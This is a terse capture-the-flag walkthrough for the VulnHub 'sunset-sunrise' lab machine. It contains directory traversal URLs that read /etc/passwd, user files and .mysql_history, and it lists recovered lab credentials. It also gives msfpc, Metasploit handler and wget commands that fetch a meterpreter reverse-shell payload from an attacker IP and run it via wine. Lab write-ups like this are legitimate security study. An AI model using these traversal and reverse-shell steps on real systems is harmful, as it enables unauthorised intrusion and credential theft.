For personal entertainment only
Target machine information
https://www.vulnhub.com/entry/sunset-sunrise,406/
1. Host discovery
2. Information gathering
nmap -sS -sV -T5 -A -p-
http://192.168.174.132:8080/
3. Exploitation
Construct the PoC
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
weborf/iheartrainbows44
sunrise thefutureissobrightigottawearshades
root *C7B6683EEB8FF8329D8390574FAA04DD04B87C58
Run the wine command as root; wine can execute .exe programs.
msfpc windows 192.168.174.128
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 192.168.174.132
set lport 443
run
wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe